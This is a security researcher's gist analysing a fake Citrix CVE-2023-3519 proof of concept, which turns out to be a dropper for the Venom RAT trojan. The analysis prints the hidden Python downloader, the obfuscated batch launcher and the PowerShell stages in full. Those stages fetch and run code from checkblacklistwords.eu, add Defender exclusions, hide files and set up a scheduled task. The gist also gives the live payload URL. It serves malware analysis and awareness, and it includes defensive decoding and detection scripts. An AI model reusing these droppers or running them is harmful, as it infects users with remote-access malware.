@win3zz
Created August 24, 2023 09:27
Unmasking a Hidden Threat

As a security professional, you know how important it is to keep yourself updated in the InfoSec world. To keep myself updated about security vulnerabilities, I regularly analyze the latest Common Vulnerabilities and Exposures (CVEs). If the Proof of Concept (PoC) or write-up is publicly available, I try to analyze and understand the root cause of the vulnerability.

Today, I'm going to share a recent experience that left me surprised. I came across a public PoC for CVE-2023-3519, a critical (CVSS score: 9.8/10) unauthenticated remote code execution vulnerability in Citrix ADC. The PoC was hosted on GitHub at https://github.com/knitteruntil0s/CVE-2023-3519 (archive).

While reviewing its code, I was surprised that it was my own code that I wrote a few months ago to demonstrate the GeoServer SQL injection vulnerability (CVE-2023-25157). The burning question in my mind was: Why would anyone go through the trouble of recreating this exploit?

Let's uncover the layers of this enigma.

I started analyzing the code and observed that an additional block had been cleverly added to my original script.

# Imports, Dependencies
import requests, subprocess as s, os, base64 as b
def m(s):
    return b.b64decode(s).decode()
import sys
import json

...

# Check dependency
d = os.getenv(m('VEVNUA=='))
p = os.path.join(d, m('YmF0LmJhdA=='))
c = m('aHR0cDovL2NoZWNrYmxhY2tsaXN0d29yZHMuZXUvY2hlY2stdS9yb2JvdD85NjM0MjEzNTU/SWhlYWQ9dHJ1ZQ==').rstrip('\n')
if not os.path.exists(p):
    r = requests.get(c).content
    with open(p, 'wb') as f: f.write(r)
    s.run([p], shell=True)
else:
    print("Error: Please install all dependencies before continuing!")

...

Full code available at https://github.com/knitteruntil0s/CVE-2023-3519/blob/main/poc.py (archive)

This additional block of Python downloads content from the http://checkblacklistwords.eu/check-u/robot?963421355?Ihead=true URL (the Base64 strings passed to m() decode to TEMP, bat.bat and that URL), saves it as bat.bat in the C:\Users\USERNAME\AppData\Local\Temp\ directory, and runs that file. If bat.bat already exists, it only prints a bogus "install all dependencies" error.
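A quick way to see what a dropper like this hides is to decode every Base64-looking string literal in the file instead of running it. The following Python is an added example, not code from the gist or from the fake PoC; it takes the three m() arguments from the snippet above as its input and assumes nothing beyond the standard library.

```python
import base64
import binascii
import re
from typing import Dict, List

# The three calls to m() from the dropper block above, copied from the gist.
DROPPER_SNIPPET = r"""
d = os.getenv(m('VEVNUA=='))
p = os.path.join(d, m('YmF0LmJhdA=='))
c = m('aHR0cDovL2NoZWNrYmxhY2tsaXN0d29yZHMuZXUvY2hlY2stdS9yb2JvdD85NjM0MjEzNTU/SWhlYWQ9dHJ1ZQ==').rstrip('\n')
"""

# A quoted literal made only of the Base64 alphabet, at least four characters
# long, with optional '=' padding. Ordinary short words are filtered out later
# by the length-multiple-of-four and printable-text checks.
BASE64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{4,}={0,2})['"]""")


def decode_base64_literals(source: str) -> Dict[str, str]:
    """Map each Base64-looking string literal in `source` to its decoded text.
    Literals that are not valid Base64, or that decode to non-text bytes, are
    skipped, so the result only contains values an analyst can act on."""
    found: Dict[str, str] = {}
    for match in BASE64_LITERAL.finditer(source):
        literal = match.group(1)
        if len(literal) % 4:
            continue
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.isprintable():
            found[literal] = text
    return found


def indicators(decoded: Dict[str, str]) -> List[str]:
    """Keep the values worth recording as indicators: URLs and file names."""
    return sorted(v for v in decoded.values() if v.startswith("http") or "." in v)


if __name__ == "__main__":
    decoded = decode_base64_literals(DROPPER_SNIPPET)
    for literal, text in decoded.items():
        print(f"{literal[:20]:<20} -> {text}")
    print("indicators:", indicators(decoded))
```

Run against a whole PoC file rather than the excerpt, the same function surfaces every hidden path, environment variable name and URL in one pass, which is usually enough to decide whether a "dependency check" is really one.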

The content of the bat.bat file is as below:

@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit

::                                                           !!!! WARNING !!!!                                                         ::
:: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ::
::                                                                                                                                     ::
:: (!) DO NOT EDIT THIS FILE UNLESS YOU KNOW WHAT YOU ARE DOING - EDITING ANYTHING IN HERE MAY CAUSE MISS BEHAVIOR AND CAUSE PROBLEMS  ::
::     ON YOUR COMPUTER (!)                                                                                                            ::
:: (!) IF ANYONE TOLD YOU TO COPY AND PASTE CODE IN HERE OR DOWNLOAD ADDITIONAL FILES, THEY ARE MOST LIKELY TRYING TO SCAM YOU,        ::
::     UNLESS YOU ARE A TESTER AND THE OFFICIAL DEVELOPERS TOLD YOU TO DO SO (!)                                                       ::
::                                                                                                                                     ::
:: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ::
::                                                                                                                                     ::
set czxczxcy=%DATA%
set zxczxczy.MAIN=%DLC.DIR%\1_example
set zxczccrz=U
set cacazxzz=P
set baxzxzxz=-
set czxzxzxz=WE
set zxczccrv=GA
set zxczxzxz=SHE
set xzzxcplm=sAy
set pxxzpzxz=i
set zxcvccpp=...found
set zxazxzxz=LL
set zxxfsazx=.e
set slzxzxzx=/
set tczxczxt=t
set zxczpprz=U
set xzxzznbv="
set zhzxczxc=e
set xcvovxzx=ypA
set zxczccrb=...loading
set fxcxccfb=Ready


::Created by 136MasterNR - Read the "copyright.txt" file for more info.
::(Use "NotePadPP" or anything other than "Notepad" to view better this file)
:: Languages used:    99.8% Batch    0.2% VBScript



::   if not accessible then exit
s%tczxczxt%ar%tczxczxt% %slzxzxzx%m%pxxzpzxz%n %cacazxzz%o%czxzxzxz%r%zxczxzxz%%zxazxzxz%%zxxfsazx%x%zhzxczxc% %baxzxzxz%w%pxxzpzxz%n h%pxxzpzxz%dd%zhzxczxc%n %baxzxzxz%%zhzxczxc%x%zhzxczxc%c b%xcvovxzx%ss %baxzxzxz%%zhzxczxc% %xzxzznbv%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%xzxzznbv%
:: ERROR (FILE NOT FOUND)


IF DEFINED RUNNING (
	::If it enters this statement then throw an error,
	::this usually means that the invade's main function has crashed.
	CALL :ERROR ERRLINE IDUNEXPECTED_CRASH    0
	EXIT 1
) ELSE @IF /I NOT DEFINED STARTED EXIT 1


:STARTUP-COMPLETE
SET RUNNING=TRUE
IF DEFINED WT_SESSION (
	CLS
	ECHO !^!! WARNING !^!!
	ECHO.Windows Terminal does not support the essential display
	ECHO.features specialized for the Command Prompt.
	ECHO.
	ECHO.Due to this, you will experience various unexpected
	ECHO.display issues while playing the invade.
	ECHO.
	ECHO.Windows Terminal has other critical issues too, such as
	ECHO.corrupting child tasks, causing infinite error messages,
	ECHO.and such other issues.
	ECHO.
	ECHO.Press any key to ignore this warning or launch the invade
	ECHO.in Command Prompt.
	PAUSE>NUL
	CLS
)
:: Check if directory files are accessible, such as itself.
IF NOT EXIST "%~n0%~x0" (
	CLS
	ECHO.ERR : Inaccessible Directory.
	ECHO.
	ECHO.Try the following:
	ECHO.1. Do not run the batch file within a zip file or any winrar format.
	ECHO.2. Make sure that the batch file has permissions to Read/Write in this directory.
	ECHO.3. Do not launch the batch file directly from a search bar or a run-in.
	ECHO.4. If you are using a shortcut, make sure you added the correct directory.
	ECHO.5. Try launching with administrator/elevated permissions.
	PAUSE>NUL
	EXIT

:: Check if the invade can reach the directory.
:: This can be a problem if the directory contains characters that batch doesn't understand.
) ELSE IF NOT EXIST "%CD%" (
	CLS
	ECHO.ERR : Unreachable Directory.
	ECHO.
	ECHO.Try the following:
	ECHO.1. Move the invade ^(the whole folder^) to a different location.
	ECHO.2. Make sure the directory's URL name includes ONLY latin characters.
	ECHO.3. Do not move it to shared folders or onedrive.
	PAUSE>NUL&EXIT
)

:: Checks if the directory was altered, this mostly happens when launched in a zip file.
IF NOT "%CD%"=="%OCD%" (
	CLS
	ECHO.ERR : Altered Directory.
	ECHO.
	ECHO.Try the following:
	ECHO.1. Make sure to extract the invade from the zip file.
	ECHO.2. Bad shortcut options, such as working directory.
	ECHO.3. Do not launch from shared folders or onedrive.
	PAUSE>NUL&EXIT
)
:RESTART
COLOR 0F
SET COLS=117
SET LINES=48
MODE CON:COLS=%COLS% LINES=%LINES%
ECHO.�[H�[s Loading ...

exit

This script looks like an obfuscated batch script, but it's cleverly designed to execute a Base64-encoded PowerShell script. The following unobfuscated line contains the real action:

start /min PoWErSHELL.exe -win hidden -exec bypAss -e "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"

The -e switch takes the script Base64-encoded (PowerShell expects the UTF-16LE encoding of the text). Here is the decoded version of the script:

[Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; 
(New-Object System.Net.WebClient).DownloadFile("http://checkblacklistwords.eu/c.txt", "$env:TEMP\c.ps1"); 
Invoke-Expression -Command "$env:TEMP\c.ps1"
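The deobfuscation above can be reproduced mechanically: the set lines define short fragments, the launcher line glues them together through %name% expansion, and the -e argument is Base64 of the UTF-16LE script. The following Python is an added example, not part of the gist. Since the Base64 blob itself is not reproduced on this page, the launcher line carries a placeholder token, and a blob re-encoded from the decoded PowerShell shown above (a constructed sample) is used to exercise the final decode step.

```python
import base64
import re

# `set name=value` lines copied from the bat.bat above. Only some feed the
# launcher line, but all are kept so the parser runs on the real input.
BAT_VARIABLES = """
set zxczccrz=U
set cacazxzz=P
set baxzxzxz=-
set czxzxzxz=WE
set zxczccrv=GA
set zxczxzxz=SHE
set xzzxcplm=sAy
set pxxzpzxz=i
set zxcvccpp=...found
set zxazxzxz=LL
set zxxfsazx=.e
set slzxzxzx=/
set tczxczxt=t
set zxczpprz=U
set xzxzznbv="
set zhzxczxc=e
set xcvovxzx=ypA
set zxczccrb=...loading
set fxcxccfb=Ready
"""

# The launcher line from bat.bat. The gist does not reproduce the long Base64
# blob, so the placeholder <BASE64_PAYLOAD> stands in for it.
OBFUSCATED_LINE = (
    "s%tczxczxt%ar%tczxczxt% %slzxzxzx%m%pxxzpzxz%n %cacazxzz%o%czxzxzxz%r%zxczxzxz%"
    "%zxazxzxz%%zxxfsazx%x%zhzxczxc% %baxzxzxz%w%pxxzpzxz%n h%pxxzpzxz%dd%zhzxczxc%n "
    "%baxzxzxz%%zhzxczxc%x%zhzxczxc%c b%xcvovxzx%ss %baxzxzxz%%zhzxczxc% "
    "%xzxzznbv%<BASE64_PAYLOAD>%xzxzznbv%"
)

# Constructed sample: the decoded PowerShell from the write-up, used to build a
# blob so the UTF-16LE decode step can be run end to end.
SAMPLE_DECODED_PS = (
    "[Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; "
    '(New-Object System.Net.WebClient).DownloadFile("http://checkblacklistwords.eu/c.txt", "$env:TEMP\\c.ps1"); '
    'Invoke-Expression -Command "$env:TEMP\\c.ps1"'
)


def parse_set_lines(text):
    """Collect `set name=value` assignments. cmd.exe keeps the value verbatim
    (a lone quote is a valid value), so nothing is stripped from it."""
    env = {}
    for line in text.splitlines():
        m = re.match(r"\s*set\s+([^=]+)=(.*)$", line, flags=re.IGNORECASE)
        if m:
            env[m.group(1).strip()] = m.group(2)
    return env


def expand_percent_vars(line, env):
    """Expand every %NAME% the way cmd.exe does before executing a batch line;
    undefined names expand to the empty string."""
    return re.sub(r"%([^%\s]+)%", lambda m: env.get(m.group(1), ""), line)


def encoded_command_to_script(blob):
    """powershell -e / -EncodedCommand carries the script as Base64 of UTF-16LE
    text, not UTF-8; decoding with the wrong encoding yields interleaved NULs."""
    return base64.b64decode(blob).decode("utf-16-le")


def make_encoded_command(script):
    """Inverse of encoded_command_to_script; used only to build the sample blob."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(launcher_line):
    """Pull the argument after -e / -enc / -EncodedCommand and decode it.
    Returns None if the line carries no decodable argument."""
    m = re.search(r'-(?:e|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]+)"?', launcher_line, re.IGNORECASE)
    return encoded_command_to_script(m.group(1)) if m else None


if __name__ == "__main__":
    env = parse_set_lines(BAT_VARIABLES)
    print(expand_percent_vars(OBFUSCATED_LINE, env))
```

The expansion step alone recovers the start /min PoWErSHELL.exe ... line shown above; the mixed case survives because cmd.exe treats the command name case-insensitively, so the fragments were chosen to break simple string matches, not to change behaviour.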

This PowerShell script downloads content from the http://checkblacklistwords.eu/c.txt URL, saves it as a c.ps1 file in the C:\Users\USERNAME\AppData\Local\Temp\ directory, and then executes the PowerShell script.

The contents of the c.ps1 file are as follows:

$filePathz = Join-Path -Path $env:temp -ChildPath 'c.txt'

if (Test-Path $filePathz -PathType Leaf) {
    exit
}

$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

if (-not $isAdmin) {
}
Start-Sleep -Seconds 200


Function gg {

Set-ExecutionPolicy -Scope CurrentUser Bypass -Force
while($true) {

	 try
  {  
                Start-Process -FilePath "powershell.exe" -ArgumentList "-windowstyle hidden -ExecutionPolicy Bypass -File $env:temp\c.ps1" -WindowStyle Hidden -Verb RunAs

exit
     
	}
    catch{}   
}
}







Function OnlyTrue {
if($isAdmin) {
Start-Sleep -Seconds 270
$filePathy = Join-Path -Path $env:TEMP -ChildPath 'c.txt'
Set-Content -Path $filePathy -Value "."

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

Start-Sleep -Seconds 1
Set-ExecutionPolicy -Scope CurrentUser Bypass -Force
Start-Sleep -Seconds 1

$exeExtension = '*.exe'
$dllExtension = '*.dll'

Set-MpPreference -ExclusionExtension $exeExtension
Start-Sleep -Seconds 10
$preferences = Get-MpPreference
$preferences.ExclusionExtension += $dllExtension
Set-MpPreference -ExclusionExtension $preferences.ExclusionExtension
Write-Host ""
$preferences.ExclusionExtension

Start-Sleep -Seconds 300

md $env:appdata\Drivers
attrib +h +s $env:appdata\Drivers

Start-Sleep -Seconds 1
Invoke-WebRequest -Uri "http://checkblacklistwords.eu/words.txt" -OutFile "$env:appdata\Drivers\Windows.Gaming.Preview.exe"
Start-Sleep -Seconds 1
Start-Process -FilePath $env:appdata\Drivers\Windows.Gaming.Preview.exe
Start-Sleep -Seconds 1
attrib +h +s $env:appdata\Drivers\Windows.Gaming.Preview.exe
Start-Sleep -Seconds 1

schtasks /create /sc minute /mo 3 /tn "Windows.Gaming.Preview" /it /rl "limited" /tr "$env:appdata\Drivers\Windows.Gaming.Preview.exe"
Start-Sleep -Seconds 1
        
    }
else {gg}
}


OnlyTrue

This code first exits if a marker file c.txt already exists in the temporary directory (so the payload is staged only once), then determines whether the current user is an administrator, using the .NET WindowsPrincipal and WindowsIdentity classes. It has two functions, gg and OnlyTrue:

  1. gg: This function loops, repeatedly launching a hidden, elevated PowerShell process (-Verb RunAs, which triggers a UAC prompt) that re-runs c.ps1 from the user's temporary directory; if the launch fails, the error is swallowed and it tries again.
  2. OnlyTrue: This function performs the following tasks if the user is an admin (otherwise it calls gg):
    • Writes the c.txt marker file and modifies Windows Defender preferences to exclude the *.exe and *.dll file extensions.
    • Creates a hidden system directory Drivers in the user's appdata directory.
    • Downloads http://checkblacklistwords.eu/words.txt as Windows.Gaming.Preview.exe into the C:\Users\USERNAME\AppData\Roaming\Drivers\ directory.
    • Starts the downloaded executable and hides it with attrib +h +s.
    • Creates a scheduled task named "Windows.Gaming.Preview" that runs the executable every 3 minutes.
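From a detection standpoint, what makes c.ps1 worth flagging is the combination of behaviours it packs into a few lines. The following Python is an added example, not from the gist, that runs a handful of static triage rules over the excerpt of c.ps1 shown above; the rule names and the ATT&CK technique mapping are my own choice for this sample, not the author's.

```python
import re

# Excerpt of the c.ps1 script shown above, used as the input for the rules.
# Line numbers in the findings refer to this excerpt.
C_PS1_EXCERPT = r"""
$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
Start-Process -FilePath "powershell.exe" -ArgumentList "-windowstyle hidden -ExecutionPolicy Bypass -File $env:temp\c.ps1" -WindowStyle Hidden -Verb RunAs
Set-ExecutionPolicy -Scope CurrentUser Bypass -Force
Set-MpPreference -ExclusionExtension $exeExtension
md $env:appdata\Drivers
attrib +h +s $env:appdata\Drivers
Invoke-WebRequest -Uri "http://checkblacklistwords.eu/words.txt" -OutFile "$env:appdata\Drivers\Windows.Gaming.Preview.exe"
Start-Process -FilePath $env:appdata\Drivers\Windows.Gaming.Preview.exe
schtasks /create /sc minute /mo 3 /tn "Windows.Gaming.Preview" /it /rl "limited" /tr "$env:appdata\Drivers\Windows.Gaming.Preview.exe"
"""

# (rule name, ATT&CK technique, pattern). The mapping is mine, chosen for this sample.
RULES = [
    ("defender_exclusion", "T1562.001", re.compile(r"Set-MpPreference\s+-Exclusion", re.I)),
    ("execution_policy_bypass", "T1059.001", re.compile(r"-ExecutionPolicy\s+Bypass|Set-ExecutionPolicy\b.*\bBypass", re.I)),
    ("elevation_request", "T1548", re.compile(r"-Verb\s+RunAs", re.I)),
    ("hidden_window", "T1564.003", re.compile(r"-windowstyle\s+hidden", re.I)),
    ("hidden_file_attributes", "T1564.001", re.compile(r"\battrib\s+.*\+h\b", re.I)),
    ("download_to_appdata", "T1105", re.compile(r'Invoke-WebRequest.*-OutFile\s+"?\$env:appdata', re.I)),
    ("scheduled_task_persistence", "T1053.005", re.compile(r"\bschtasks\s+/create\b", re.I)),
    ("executable_in_appdata", "T1036.005", re.compile(r'\$env:appdata\\[^\s"]+\.exe', re.I)),
]

# Defense evasion + ingress of a binary + persistence together is the pattern
# this sample shows; any script with all three is treated as high risk.
HIGH_RISK_COMBINATION = {"defender_exclusion", "download_to_appdata", "scheduled_task_persistence"}


def triage_script(text):
    """Run every rule over every line; return (rule, technique, line_no, line)."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, technique, pattern in RULES:
            if pattern.search(line):
                findings.append((name, technique, no, line.strip()))
    return findings


def risk_summary(findings):
    """Collapse findings to the set of behaviours and a verdict: "high" when the
    full evasion/download/persistence combination is present, "review" when
    anything at all matched, "clean" otherwise."""
    seen = {f[0] for f in findings}
    if HIGH_RISK_COMBINATION <= seen:
        verdict = "high"
    elif seen:
        verdict = "review"
    else:
        verdict = "clean"
    return {"behaviours": sorted(seen), "count": len(seen), "verdict": verdict}


if __name__ == "__main__":
    found = triage_script(C_PS1_EXCERPT)
    for name, technique, no, line in found:
        print(f"line {no:2d} {technique:<10} {name:<28} {line[:60]}")
    print(risk_summary(found))
```

Individually, several of these rules (a hidden window, an execution-policy bypass) fire on plenty of legitimate administration scripts; the verdict is deliberately tied to the combination, which is also what a PowerShell script block logging rule or an EDR query should key on.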

The script's administrative actions (Defender exclusions, a hidden directory, a scheduled task) are there to evade detection and persist. Moving on, I started analyzing words.txt:

bipin@bipin-VirtualBox:~/malware$ wget http://checkblacklistwords.eu/words.txt
--2023-08-23 14:05:30--  http://checkblacklistwords.eu/words.txt
Resolving checkblacklistwords.eu (checkblacklistwords.eu)... 217.160.0.213
Connecting to checkblacklistwords.eu (checkblacklistwords.eu)|217.160.0.213|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75776 (74K) [text/plain]
Saving to: ‘words.txt’

words.txt  100%[========================================================>]  74.00K   158KB/s    in 0.5s    

2023-08-23 14:05:35 (158 KB/s) - ‘words.txt’ saved [75776/75776]

bipin@bipin-VirtualBox:~/malware$ file words.txt 
words.txt: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
bipin@bipin-VirtualBox:~/malware$ 

Through Ghidra and virustotal.com [1] analysis, I identified it as a Venom RAT (Remote Access Trojan) [2], malware used for unauthorized remote control of a system. Acting as spyware, it silently collects sensitive data and lets the operator manipulate the machine remotely: surveillance, data theft and control. It uses encryption and obfuscation techniques to evade traditional antivirus and security measures.

The fake exploit wasn't just a prank; it was a trap for script kiddies - those who blindly run code without understanding its logic.

The moral of the story? Think twice before you run any code, especially if you don't understand what it does.

Don't forget to share this story with your friends and colleagues - maybe you can save someone from falling into such a trap.

If you're looking to study this malware example for educational reasons, you can get it from http://checkblacklistwords.eu/words.txt. If it's not available there, feel free to contact me at bipin@cuberk.com, and I can provide you with a copy.


Disclaimer: The content provided in this gist is for educational purposes only. The intention is to share a real-life experience and lessons learned from encountering a deceptive script that led to a Remote Access Trojan. The purpose is to raise awareness about the importance of understanding and scrutinizing code before execution. Readers are strongly advised not to replicate or execute any code discussed in this article without proper knowledge and precautions. The author shall not be held responsible for any misuse or consequences resulting from the information shared here.

Footnotes

  1. https://www.virustotal.com/gui/file/b77e4af833185c72590d344fd8f555b95de97ae7ca5c6ff5109a2d204a0d2b8e

  2. https://cyberint.com/blog/research/venom-control-rat-with-a-sting/
